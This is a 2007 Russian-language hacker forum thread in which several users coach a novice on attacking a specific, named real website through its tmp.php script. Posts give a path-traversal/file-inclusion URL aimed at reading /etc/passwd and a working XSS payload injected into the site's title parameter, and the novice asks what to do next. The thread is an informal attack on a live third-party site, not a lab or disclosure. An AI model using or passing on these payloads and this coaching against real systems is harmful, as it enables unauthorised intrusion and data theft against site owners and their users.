HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 17.12.2007, 17:04
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

зачем ещё !?!? мине хоть бы с этим разобраться
 
Ответить с цитированием

  #12  
Старый 17.12.2007, 17:07
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами: 10495046

Репутация: 2642


По умолчанию

Include, Xss. Всё, что тебе нужно, ты сможешь сделать с сайтом, если конечно права есть и фильтрации нет.
 
Ответить с цитированием

  #13  
Старый 17.12.2007, 17:07
scrat
Постоянный
Регистрация: 08.04.2007
Сообщений: 853
С нами: 10048706

Репутация: 1540


По умолчанию

попробуй:
Код:
http://site.ru/nw/tmp.php?url=../../../../../../../../../etc/passwd%00&title=privet
 
Ответить с цитированием

  #14  
Старый 17.12.2007, 17:10
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами: 10495046

Репутация: 2642


По умолчанию

Цитата:
Сообщение от scrat  
попробуй:
Код:
http://site.ru/nw/tmp.php?url=../../../../../../../../../etc/passwd%00&title=privet
Ну нахрен ему /etc/passwd? Он инклюд только первый раз видит. Тем более там ноль байтов не нужно.
 
Ответить с цитированием

  #15  
Старый 17.12.2007, 17:13
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

/etc/passwd не выводит ... а такой инклуд да я первый раз вижу ... я по скулю лучше
 
Ответить с цитированием

  #16  
Старый 17.12.2007, 17:13
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

там помойму ремоут инклуд =\
 
Ответить с цитированием

  #17  
Старый 17.12.2007, 17:14
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

ссылку дай лучше
 
Ответить с цитированием

  #18  
Старый 17.12.2007, 17:36
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=1444
 
Ответить с цитированием

  #19  
Старый 17.12.2007, 17:47
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=<img src=javascript:alert()>
 
Ответить с цитированием

  #20  
Старый 17.12.2007, 18:03
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами: 9799586

Репутация: 1385


По умолчанию

Цитата:
http://www.megaopt.spb.ru/nw/tmp.php?url=news.htm&title=<img src=javascript:alert()>
это я и сам обнаружил - но я всё никак понять не могу что дальше ???
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
All xss RetRon Уязвимости CMS / форумов 10 18.12.2005 21:54
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
XSS в Phorum<=5.0.14 tester2005 Уязвимости 22 17.03.2005 07:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.